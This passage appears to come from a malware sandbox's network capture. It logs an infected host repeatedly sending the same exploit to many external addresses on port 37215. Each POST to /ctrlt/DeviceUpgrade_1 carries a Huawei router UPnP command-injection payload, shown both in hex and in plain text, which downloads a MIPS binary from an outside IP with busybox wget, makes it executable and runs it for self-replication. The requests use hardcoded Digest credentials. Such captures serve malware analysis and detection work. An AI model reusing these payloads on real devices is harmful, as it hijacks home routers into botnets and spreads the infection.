                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          332192.168.2.155548841.144.177.8037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.544312000 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          333192.168.2.154190641.244.94.7637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.544333935 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          334192.168.2.1555416157.148.63.17437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.544359922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          335192.168.2.1536846197.227.44.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.545789003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          336192.168.2.1539404197.100.15.24937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.546000957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          337192.168.2.1543586197.82.129.14137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.546154022 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          338192.168.2.153470459.32.220.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.546161890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          339192.168.2.1536572149.14.32.22537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.546210051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          340192.168.2.153673441.223.242.17737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.547131062 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          341192.168.2.1560544197.113.37.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.547502995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
